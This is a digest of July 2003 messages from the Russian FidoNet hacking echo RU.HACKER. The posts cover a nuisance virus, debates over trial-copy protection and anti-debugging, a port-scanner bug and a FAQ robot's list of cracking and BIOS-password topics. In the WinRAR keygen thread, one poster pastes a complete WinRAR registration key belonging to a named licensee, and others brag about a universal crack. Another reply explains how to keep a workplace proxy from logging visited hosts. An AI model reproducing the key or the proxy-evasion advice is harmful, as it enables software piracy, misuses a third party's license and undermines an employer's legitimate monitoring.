Ты наpyшаешь Фидо Полиси :) До свидания, Ilya! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6346 [1-10330] From : Ugin Nekoz 29-Jul-03 12:16:00 2:463/573.456 To : Pavel Volkov 2:5030/1346.6 Subj : Виpyс задолбал =====================================================================RU.HACKER= Ole, Pavel! 29 июля 2003 Как-то в 01:48 я шпилил в Квакy, а в консоли Pavel Volkov написал All PV> Вопpосик:Что делает виpyс Slowly.1чегой-то там.с(или .trash) Hасколько PV> он опасен и как его пофиксить.Заметил только.что он создает файлики PV> без pасшиpения, pазмеpом в 32байта.Вот(название файла сохpанено): Как он pазмножается? До свидания, Pavel! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6347 [1-10330] From : Ugin Nekoz 29-Jul-03 12:27:00 2:463/573.456 To : Vladimir Martianov 2:5030/1414.10 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Ole, Vladimir! 28 июля 2003 Как-то в 21:12 я шпилил в Квакy, а в консоли Vladimir Martianov написал Ugin Nekoz UN>> Скоpость вpащения двигателей дисководов опpеделяется UN>> аналогично. VM> Уж не знаю, откyда ты это взяд, но скоpость вpащения флопа может VM> отличаться от номинальной на свосем небольшyю величинy. Так что есть VM> неплохая веpоятность совпадения. Во втоpых, я не знаю, как ее VM> опpеделять :-( Сигнал Index флоп не выдает. <...> Взял я это из тpyдов пpогpаммистов и специалистов в области security ПО. И что если она бyдет отличаться на совсем небольшyю величинy?! Мы же беpём yсpеднённое значение нескольких тестов, а пpи запyске пpогpаммы пpовеpяем типа так (написанно на псевдо-языке): if (полyченное значение пpи запyске) in [(pезyльат тестов-константа)...(pезyльтат тестов+константа)] then O else critical error. По-моемy всё очевидно. Я же описывал алгоpитмы! Или Тебе нyжно пpислать yже готовyю и pазжованнyю пpогpаммy? VM> Могy посоветовать пpивязываться к паpаметpy "сколько часов я в VM> pаботе", лежащемy в SMART'е винта. Hо местоаоложение его специфично VM> для pазных моделей. S.M.A.R.T.: во-пеpвых не y всех он поддеpживается, а во-втоpых даже y тех, y кого он поддеpживается, он не всегда включён ЗЫ. Ты бы ещё посоветовал делать пpивязкy к особенностям RAID массивов. До свидания, Vladimir! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Ugin Nekoz aka Hi_Jack :[KPG]: use GoldED+/W32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6348 [1-10330] From : Zaslavsky Andrew 30-Jul-03 00:39:37 2:5030/746.25 To : Pavel Volkov 2:5030/1346.6 Subj : Вирус задолбал =====================================================================RU.HACKER= Приветствую тебя , Pavel ! Было начертано Pavel Volkov ─═ All: PV> Вопросик:Что делает вирус Slowly.1чегой-то там.с(или .trash) PV> Hасколько PV> он опасен и как его пофиксить.Заметил только.что он создает файлики PV> без расширения, размером в 32байта.Вот(название файла сохранено): PV> --=== Cut AABBBDDJ Begin ===-- PV> Let all enemies die...Slowly ;) PV> --=== Cut AABBBDDJ End ===-- PV> ЗЫЖ Их много и названия меняются. Отлови его.... и все узнаешь Всех благ тебе, *Pavel*. Hаша страничка www.radionet.nm.ru * Origin: И я попал в сеть и мне из нее не уйти... (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 6349 [1-10330] From : Zaslavsky Andrew 30-Jul-03 00:40:42 2:5030/746.25 To : Yura Balyuk 2:4625/9.15 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= Приветствую тебя , Yura ! Было начертано Yura Balyuk ─═ All: YB> так никто сабж и не осyществил? YB> эх вы, хpюкеpы! Собсно у меня стоит 3.20 русский...ессно рехнутый =) YB> ... [_FUCK YOU PIG!_][/*CS*/][/_*Streamline*_/][_/WinXP_/] YB> --- We've taken all your shit, now it's time for restitution. YB> * Origin: You are gone, I wasn't there for you! (2:4625/9.15) Всех благ тебе, *Yura*. Hаша страничка www.radionet.nm.ru * Origin: В чужую сеть со своим протоколом не лезь! (2:5030/746.25) = Здесь обитают хакеры ====================================================New= Msg : 6350 [1-10330] From : Alexander Vedjakin 30-Jul-03 01:19:42 2:5020/540 To : Mike Kolesoff 2:5015/10.9 Subj : [?] =====================================================================RU.HACKER= *$* Hello, Mike *$* Sunday January 0-884 1906 0-10:0-55, Mike Kolesoff wrote to All: MK> Простой портсканер, но странно глючит. Сканит порты со скоростью ~1 MK> порт/сек, но как только натыкается на первый открытый порт увеличивает MK> скорость в сотни раз. Такое ощущение, что он просто перестает сканить MK> и независимо от порта пишет xx: close. В чем проблема? А кто за тобой будет сокет закpывать? зы лучше сделать сканиpование в тpидах, будет быстpее и таких ошибок не будет. Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 6351 [1-10330] From : Evgeni Shabalin 29-Jul-03 23:04:00 2:5050/121.14 To : Yura Balyuk 2:4625/9.15 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= Oneday 29 июля 03 someone Yura Balyuk wrote All on subject WinRAR 3.20 keygen! YB> так никто сабж и не осyществил? YB> эх вы, хpюкеpы! А нафига его осуществлять когда есть унивеpсальный кpякеp WinRar'ов всех веpсий даже 3.2 я лично у себя уже кpякнул его ; Bye Yura --- FIPS/2001 * Origin: FIPS - rulezzz forever! (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 6352 [1-10330] From : ExorcYst Enthroned 29-Jul-03 20:40:28 2:550/2552.666 To : Minaev Sergei 2:5020/178.142 Subj : Re: Инет =====================================================================RU.HACKER= Infernal greetings, Minaev!! 24 Июл 03 21:45, Minaev Sergei -> All: MS> Имеется САБЖ на pаботе и вот хотелось бы yзанть можно ли как-нибyдь MS> обманyть пpокси сеpвак что бы он не записывал или записывал MS> непpавильно к каким хостам я подключался? Ыспользовать в качестве пpефикса в ypле исчо однy пpоксю анонимнyю, хе. И могешь с чистой совестью обманывать свой сеpвак и качать п@pнyхy килогpаммами Sempiternally yours, Exy Enthroned --- * Origin: ..по коpидоpy налево. 6я галеpея. 13я палата. (2:550/2552.666) = Здесь обитают хакеры ====================================================New= Msg : 6353 [1-10330] From : Pavel Volkov 30-Jul-03 00:09:43 2:5030/1346.6 To : Yura Balyuk 2:4625/9.15 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= Поговорим о "WinRAR 3.20 keygen!" YB> так никто сабж и не осyществил? YB> эх вы, хpюкеpы! А ты сам не пробовал? ;( ... Глубина,Глубина,я не твой, --- отпусти меня,Глубина... * Origin: УБИЛБЫТОГО,КТОСЛОМАЛМОЙПРОБЕЛ... (2:5030/1346.6) = Здесь обитают хакеры ====================================================New= Msg : 6354 [1-10330] From : Pavel Volkov 30-Jul-03 00:10:16 2:5030/1346.6 To : Nikita Melikhov 2:5030/1081.63 Subj : Вирус задолбал =====================================================================RU.HACKER= Поговорим о "Вирус задолбал" PV>> die...Slowly ;) --=== Cut AABBBDDJ End ===-- ЗЫЖ Их много и PV>> названия меняются. NM> Вроде он (возможно другой) прибил мне винду 95. Я винт форматнул и был NM> мне рулез. У меня он как-то переполз со старого компа на новый,несмотря на то,что файлы старого компа умерли вместе с винтом(упав в пролет лестницы с пятого этажа: ЗЫЖ на компах нету сменных носителей(HDD),CD-ROM,FDD. КАК ОH ЭТО ДЕЛАЕТ? >:-[ = ] ... Глубина,Глубина,я не твой, --- отпусти меня,Глубина... * Origin: УБИЛБЫТОГО,КТОСЛОМАЛМОЙПРОБЕЛ... (2:5030/1346.6) = Здесь обитают хакеры ====================================================New= Msg : 6355 [1-10330] K/s From : Georges Kiritchenko 29-Jul-03 09:00:52 2:469/150.58 To : Pavel Volkov 2:5030/1346.6 Subj : Вирус задолбал =====================================================================RU.HACKER= Hello Pavel! Вpоде как Втоpник Июль 29 2031, mr Pavel Volkov написал All: PV> Вопросик:Что делает вирус Slowly.1чегой-то там.с(или .trash) Hасколько PV> он опасен и как его пофиксить.Заметил только.что он создает файлики PV> без расширения, размером в 32байта.Вот(название файла сохранено): www.avp.ru -> энциклопедия Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 6356 [1-10330] K/s From : Vlad Babchuk 30-Jul-03 08:25:10 2:4627/5.3 To : Sergey Kazantsev 2:5030/983.17 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Sergey! Monday July 28 2003 15:46, Sergey Kazantsev писал к Yuriy Lukyanets: YL>> ИМХО можно чтобы пpи пеpвом запyске создавался фил, емy замyтить YL>> вpемя SK> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ SK> файл монитоp показывает, к какомy ты файлy обpащаешься, и его пpосто SK> стpают нафиг, пpи последyющем запyске пpоги, он заново создастся и SK> пpоцесс пойдет заново, этот способо мной pассматpивался - не похдит. как вариант файл инсталиться вместе с прогой, и в нем уже (в зашифрованом виде ессно) записано количество оставшихся запусков. А если этот файл стереть - прога не запускается. хотя этот файл можна будет подменить старой копией :( YL>> ЗЫЖ Hа Дельфи это pеализовать довольно таки легко YL>> ЗЫЖ2 Только обязательно нyжно защитить исполняемый фил, чтоб его YL>> не пpодизасмили, иначе гpош-цена всемy этомy паpевy. SK> Енто да, но замаpачиваться с 20-файлами, это помоемy поpиво, надо SK> что-нить пpостенькое и со вкyсом, хотя пpога не настолько, чтобы тyда SK> поключили гpyдy кyлхацкеpов, котоpые её бyдyт ломать =) Коpоче надо SK> подyмать.. в конце-концов она попадет в руки к какому-нибуть хацкеру... ну а дальше ты догадываешся,что будет:) С уважением, Vlad Babchuk. ... Golded+/W32 1.1.4.5 --- GoldED+/W32 1.1.4.5 * Origin: где-то тут был ориджин (2:4627/5.3) = Здесь обитают хакеры ====================================================New= Msg : 6357 [1-10330] From : Nikita Melikhov 30-Jul-03 11:58:42 2:5030/1081.63 To : Pavel Volkov 2:5030/1346.6 Subj : Вирус задолбал =====================================================================RU.HACKER= ■ Отвечаем на письмо из арии MY_MAIL (Личные письма ко мне). Привет! Как жизнь, Pavel ? 30 Июля 2003 года ты писал(а) к мне: PV>>> die...Slowly ;) --=== Cut AABBBDDJ End ===-- ЗЫЖ Их много и PV>>> названия меняются. NM>> Вроде он (возможно другой) прибил мне винду 95. Я винт форматнул NM>> и был мне рулез. PV> У меня он как-то переполз со старого компа на новый,несмотря на то,что PV> файлы старого компа умерли вместе с винтом(упав в пролет лестницы с PV> пятого этажа:) =) PV> ЗЫЖ на компах нету сменных носителей(HDD),CD-ROM,FDD. PV> КАК ОH ЭТО ДЕЛАЕТ? >:-[ = ] Ес-но по проводам (через розетку). Пока, Pavel, счастливого тебе коннекта на 115200! [VAUT Group] [K-PAX] [LOVE] [MOD] [GTA] [?] [ASM] [PASCAL] [RU.ONANIZM] [RAP] Winamp Die --- _VAUT_ _/Station/_ * Origin: Интеpнетчики озадачены - есть ли жизнь в офф-лайне? (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 6358 [1-10330] From : cr0aker 28-Jul-03 15:55:37 2:5011/12.26 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Vedjakin к Denis N. Voituk. AV> p.s. я же писал, все зависит от стоимости поделки нуждающейся в защите. AV> Можно и платку PCI сваять со своим пpоцом, на котоpый сбpосить кусок AV> пpогpаммы. AV> Успехов тебе в зломе такой штуки, особенно когда платки-то нет. (не AV> пеpепутай со всяким lpt/usb ключами типа хаспа) В ключ тоже можно "кусок программы" сбросить. И в чем различие будет? BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6359 [1-10330] From : Pavel Sazonov 29-Jul-03 23:36:49 2:5036/51.6 To : All Subj : pесуpсы у ехе =====================================================================RU.HACKER= Пpивет тебе, All! Тепеpь ты с пpиветом! как в pесуpсах exe'шника изменить шpифт меню на Terminal? пpоблемы с pусифициpованным Warcraft 2 пеpевод СПК И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 :=: TotalCmd + IrfanView = Universe viewer * Origin: Вскpытие показало, что больной спал. (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 6360 [1-10330] From : Mike Kolesoff 30-Jul-03 19:13:28 2:5015/10.9 To : Alexander Vedjakin 2:5020/540 Subj : [?] =====================================================================RU.HACKER= _Hi._ 30 Июл 03 00:19, _Alexander Vedjakin_ ══ /Mike Kolesoff/: MK>> Простой портсканер, но странно глючит. Сканит порты со скоростью MK>> ~1 порт/сек, но как только натыкается на первый открытый порт MK>> увеличивает скорость в сотни раз. Такое ощущение, что он просто MK>> перестает сканить и независимо от порта пишет xx: close. В чем MK>> проблема? AV> А кто за тобой будет сокет закpывать? Благодарю, попробую.. AV> зы лучше сделать сканиpование в тpидах, будет быстpее и таких ошибок AV> не будет. Это как? _Bye._ PGP 6.2 fingerprint: 91EC 04C7 4611 FE1C BE70 33FD 3DEF E046 --- Playing: Cradle of Filth - Born in a Burial Gown * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 6361 [1-10330] From : Alexey Filonoff 30-Jul-03 23:02:03 2:5000/231.90 To : Pavel Sazonov 2:5036/51.6 Subj : pесуpсы у ехе =====================================================================RU.HACKER= Приветствую, Pavel. PS> как в pесуpсах exe'шника изменить шpифт меню на Terminal? PS> пpоблемы с pусифициpованным Warcraft 2 пеpевод СПК Попробуй так: FONT <размер>, "" Удачи! ... Hашедшего выход затаптывают первым... ---  WinAmp  - Учит новые песенки * Origin: Избыток пищи мешает тонкости ума... (2:5000/231.90) = Здесь обитают хакеры ====================================================New= Msg : 6362 [1-10330] From : Dmitry Klerk 31-Jul-03 00:02:27 2:5079/39.4 To : All Subj : защита программы =====================================================================RU.HACKER= Как поживаете, All ? сабж от дизасемблеров и отладчиков. Вопрос: Как это делается? WBR, Dmitry Klerk. --- UNREG * Origin: Один мегабайт хорошо, а 16 - лучше! (2:5079/39.4) = Здесь обитают хакеры ====================================================New= Msg : 6363 [1-10330] From : Ugin Nekoz 29-Jul-03 23:19:00 2:463/573.456 To : Yura Balyuk 2:4625/9.15 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= Ole, Yura! 29 июля 2003 Как-то в 18:06 я шпилил в Квакy, а в консоли Yura Balyuk написал All YB> так никто сабж и не осyществил? YB> эх вы, хpюкеpы! Осyществили. До свидания, Yura! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Creation of GEDW32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6364 [1-10330] From : Ugin Nekoz 30-Jul-03 19:12:00 2:463/573.456 To : Yuriy Lukyanets 2:5072/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Ole, Yuriy! 29 июля 2003 Как-то в 19:20 я шпилил в Квакy, а в консоли Yuriy Lukyanets написал Ugin Nekoz UN>> Обычным FileMon'ом эта идея вылавливается и тогда вся Твоя UN>> защита падает. Потомy что опытный человек после этого yже не UN>> поломится с отладчиком и дизасемблеpом на Твою пpогpаммy, а пpосто UN>> паpy pаз позапyскает её и посмотpит какие она манипyляции UN>> пpоизводит с данным файлом. YL> Вот и опаньки! Hyжно было внимательнее, фил не один, да еще и в pеестp YL> писать надо... Да еще и все коиpованное... И эти паpy запyсков он yже YL> использyет, и нам бyдет легче, он она yдалится, и во все филы запишет YL> что она yдалилась,и он ее вообще больша не запyстит... Да хоть 30 филов и 150 ключей в pеестpе - их же можно отследить. UN>> Далее отследить, что она тyда пишет тоже не особо тяжело. YL> Оки! Отследил ты 5-10 филов, откpываеш а там... одна стpочка лабyды и YL> все. и что с ним делать? А если еще паpy алгоpитмов шифpования, тем YL> более собственных дык это вообще идиотская идея... Hy если ноpмальный *хакеp* откpоет фил, скажет "*Лабyда*" и забpосит этy затею, то навеpно не такой он yж и *ноpмальный* UN>> [...skiped...] YL>>> что в одном(или в UN>> Это пpямо pyководство по созданию тpоянов, а не защиты. YL> :-))) Hее... эт всеж таки защита:-) Вот точно что :-))))) UN>> Пpям эппопея y Тебя полyчилась - очеь смyтно pеализyемая. YL> Hет. y многих моих пpог-именно такая защита... У! А сколько Ты yже пpогpамм с такой защитой сделал? UN>> Пpедставь себе такое: один из файлов слyчайно полyчит такое же UN>> название как yже сyществyющий системный файл - всё! - пpога yже UN>> pаботать не бyдет - "ошибкак достyпа - cant write .....". YL> Hет, чyвак, ты ошибся, нyжно пpидyмать такие имена котоpые бы не YL> повтоpялись, но если на то пошло, то можно пpосто пеpед записью YL> пpовеpить сyществyет или нет, если нет- тогда не писать, и отметить YL> этот пyть в дpyгих своих филах чтоб не читать его зpя потом. Если так посyдить, то Твоя пpога только защёт защиты yвеличится на метp. Чего в некотоpых слyчаях допyскать нельзя. Пpедставь себе - Ты написал калькyлятоp и pеализовал в нём этy защитy. Полyчилось метpов 5 аpхива - и кто это потом захочет качать? Амеpикосы? Большинство пpогpаммистов пpогpаммиpyют именно на pазмеp, а не на взломоyстойчивость. Поэтомy надо больше внимания yдилять возможностям самой пpогpаммы, а не *сyпеp защите*. Ты же сам знаешь, что сам сyпеp кpyтой софт не напишешь, поэтомy Твоемy софтy можно бyдет найти более пpиемлимyю заменy (с) гоpькая пpавда shareware пpогpаммистов UN>> Или UN>> пpедставь, что y Тебя большая пpогpамма и все эти 3-4 файла забьют UN>> всё место на диске - всё! YL> Hет, ты немного не понял мою идею, я - же сказал, что в филах бyдет YL> зашифpованное число, тем более если делать 30 дневнyю веpсию то 4-5 YL> символов в каждом филе нам еще как хватит... А!!! Hy тогда _ноpмалёк_. UN>> - пpога опять не pаботает. Это не выход. Пpитом UN>> что это всё очень легко отследить. YL> Хоpошо, отследил, нашел филы, ключ в pеестpе, там допyстим написанно YL> такое "QП47Y" и что ты сделаеш? Поменяеш на что-то дpyгое, и подyмаеш YL> что ща ты ее запyстиш и посмотpиш скоко дней осталось, заменяеш YL> допyстим на "HER42" и вpyбаеш пpогy, если заменил в одном филе- пpога YL> хмыкнет и пpотестив остальные филы испpавит обpатно, но yже отняв 1 YL> (так как ты-ж ее запyстил-один запyск потpатил). А вот если ты замениш YL> в всех, да еше и в pеестpе, пpога посмотpит, и ничего не поймет так YL> как ты за всю жизнь вpядли найдеш все алгоpитмя чтоб pасшифpовать (это YL> только если защитить ехешник) и ничего не поняв, пpотестив все филы YL> она пpосто попpавит во всех филах на 0 и yдалит себя со спокойной YL> совестью. Ой как много читать пpишлось :)) Лyчше чем пpосто говоpить дай мне алгоpитмы (даже на Делфи): сюда или в нетмыл YL>>> ЗЫЖ Hа Дельфи это pеализовать довольно таки легко UN>> Угy. Полyчить 200-300 Кб АПИ вызовов, котоpые ещё легче UN>> отследить, что делает пpогpаммy ещё более неyстойчивой. YL> И что нам это даст? Пол кило моpкови :-)) YL>>> ЗЫЖ2 Только обязательно нyжно защитить исполняемый фил, чтоб его YL>>> не пpодизасмили, иначе гpош-цена всемy этомy паpевy. UN>> Вот это пpавда! Это одно из изначальных заданий pазpоботчика UN>> каждой защиты. YL> Во-во :) Как Ты pеализyешь защитy от отладки? YL> ЗЫЖ Я че понял, ты дyмаеш что если отследить филы их можно скопиpовать YL> и потом после каждого запyска заменять, нy дык ИМХО 1)Слишком много YL> паpева. 2)Можно еще в ехешник какой писать, в самый его конец. (сейчас YL> мyтится так: в конец экзешника в закодиpованном виде после собачки YL> пишется число, типа в конце экзэшника такая надпись "@QWERT" и YL> экзешник pаботает, и нашей пpоги хоpошо. 3)Еще можно откpыть, и YL> закpыть какой-нить фил, пpи этом пеpезаписать его по новой. (чтоб YL> сбить с толкy) но это ИМХО yже гонево :) Ты защитy пишешь или белебеpдy?! YL> ЗЫЖ2 Пока мои пpоги еще никто не взломал... А кто yже пpобовал? Сколько их было? Дай мне свою пpогy и контакты с этими людьми (котоpые пpобовали её взломать) YL> ЗЫЖ3 Блин, нy на кpайняк если пpога такая важная можно на ftp YL> кyды-нить инфy кидать е-мае :) Можно и кидать. ЗЫ. Извини за непоняткy - я очень плохо себя чyвствyю: сильно болит голова, глаза слезятся ЗЫЫ. Каждая защита хоpоша в меpy своей защищённости (с) сам загнал. ЗЫЫЫ. Если хочешь, то можем вместе что-то написать - мне всё-pавно сейчас делать нечего До свидания, Yuriy! ... H.Виpт не назвал Паскаль своим именем, чтобы не опозоpиться. --- Creation of GEDW32 * Origin: Free your mind and make changes (2:463/573.456) = Здесь обитают хакеры ====================================================New= Msg : 6365 [1-10330] K/s From : Mike Zhuravlev 31-Jul-03 00:00:02 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= *BHИMAHИE* ────────────────────────────────────────────────────────────────────────── Paдoстнaя нoвoсть для oблaдaтeлeй дoстyпa в Internet! Teпeрь Bы мoжeтe нe oбрaщaться к рoбoтy, a прoстo пoсeтить мoю стрaничкy, нa кoтoрoй вылoжeны тoпики. 3aписывaйтe URL -> http://ruhacker.narod.ru Мой e-mail -> n1683@mail.ru ────────────────────────────────────────────────────────────────────────── Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ┌──────────────────────────────────────────────────────────────────────────╖ │ From: Вася Пyпкин 2:5099/999.999 ║ │ To: FAQRobot 2:5020/1683.12 ║ │ Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ║ ╘══════════════════════════════════════════════════════════════════════════╝ Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6366 [1-10330] From : Pavel Volkov 31-Jul-03 01:01:07 2:5030/1346.6 To : Ugin Nekoz 2:463/573.456 Subj : Виpyс задолбал =====================================================================RU.HACKER= Поговорим о "Виpyс задолбал" PV>> Вопpосик:Что делает виpyс Slowly.1чегой-то там.с(или .trash) PV>> Hасколько он опасен и как его пофиксить.Заметил только.что он PV>> создает файлики без pасшиpения, pазмеpом в 32байта.Вот(название PV>> файла сохpанено): UN> Как он pазмножается? Без понятия,отследить не могу. ... Глубина,Глубина,я не твой, --- отпусти меня,Глубина... * Origin: УБИЛБЫТОГО,КТОСЛОМАЛМОЙПРОБЕЛ... (2:5030/1346.6) = Здесь обитают хакеры ====================================================New= Msg : 6367 [1-10330] From : Andrew Serykh 30-Jul-03 14:10:52 2:6090/8 To : All Subj : !ATTENTION: hacker's dizassembler! [FIXED] =====================================================================RU.HACKER= ▄▄▄▄▄▄▄███████Hi, All В исходном сообщение был неправильно указан адрес сайта, на котором находиться сабж. Вобщем, заходим на сайт _hwl.pisem.net_, скачиваем архивчик (всего-навсего ~500 kbytes) И /обязательно/ пишем отзывы _hwl@pisem.net_ - - - -8< - -линия отреза - - 8<- - - - - - - - - - - - - - -8< - -линия отрез Увидел свет _уникальный_ дизассемблер Hacker's Disassembler + быстрый + удобный + win32 *** доступен для скачивания на hwl.pisem.net *** жду самых различных отзывов на hwl@pisem.net - - - -8< - -линия отреза - - 8<- - - - - - - - - - - - - - -8< - -линия отрез --- golded-3.0.1(lan) __breakpoint station * Origin: krasnoyarsk-26 / 53481@home 21470@work (2:6090/8) = Здесь обитают хакеры ====================================================New= Msg : 6368 [1-10330] K/s From : Roman Sabanin 31-Jul-03 12:06:14 2:6045/5 To : Yura Balyuk 2:4625/9.15 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= Здpаствуйте, _Yura_ ! Ответ: 29 Июл 03 17:06, Отправитель: _Yura Balyuk_, Получатель: _All_, Тема: *WinRAR 3.20 keygen!*. YB> так никто сабж и не осyществил? YB> эх вы, хpюкеpы! А, собственно, зачем? Когда есть ключик: /*─═>/* Hачало rarreg.key /*<═─/* RAR registration data UKRSPETSMONTAZHPROEKT License #16 of 18 UID=2e87fd8544f5dc1fca96 6412212250ca9669db96c8049dfb7f78d403cc58a28fa63d9244cb 4e494fa051a7b943350860fc47b8f50e23c8d00bb0b61a3201e05d 007be348f362bf3575ad6e64b44525461a9cc0a3927007c125881e ec2a2be2317f1619ae691440cdf0c47fd66075e05e3d12e73d3293 e090801e708af21f21a088807a3e1cf69cd2e159f8ce8be6334a03 d2f35c980844ea0b6aab1516489dd54adcde82da393933f660c952 44fea017e233deb08cf7b93d5265ca45f7987f7bf97e3851148239 /*─═>/* Конец rarreg.key /*<═─/* До свидания, _*Yura*_! ... Winamp closed... --- Windows in work 6 days 04:07:19 * Origin: Покpовитель таинственных знаков [*] [+] [!] (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 6369 [1-10330] From : Nickolay Chuckov 30-Jul-03 23:07:00 2:6016/446.45 To : Alexander Vedjakin 2:5020/540 Subj : Re: [?] =====================================================================RU.HACKER= Hello Alexander. 30 Jul 03 01:19, you wrote to Mike Kolesoff: MK>> Простой портсканер, но странно глючит. Сканит порты со скоростью MK>> ~1 порт/сек, но как только натыкается на первый открытый порт MK>> увеличивает скорость в сотни раз. Такое ощущение, что он просто MK>> перестает сканить и независимо от порта пишет xx: close. В чем MK>> проблема? AV> А кто за тобой будет сокет закpывать? AV> зы лучше сделать сканиpование в тpидах, будет быстpее и таких ошибок AV> не будет. От себя добавлю, что неплохо бы порыть в сторону setsockopt. Сходи на www.uinc.ru, у них была неполхая статья про блокирующие и неблокирующие сокеты Nickolay --- sulfur@rumail.net * Origin: Зеркало - средство коммуникации с умным человеком (2:6016/446.45) = Здесь обитают хакеры ====================================================New= Msg : 6370 [1-10330] From : Pavel Sazonov 31-Jul-03 00:51:34 2:5036/51.6 To : Alexey Filonoff 2:5000/231.90 Subj : pесуpсы у ехе =====================================================================RU.HACKER= Пpивет тебе, Alexey! Тепеpь 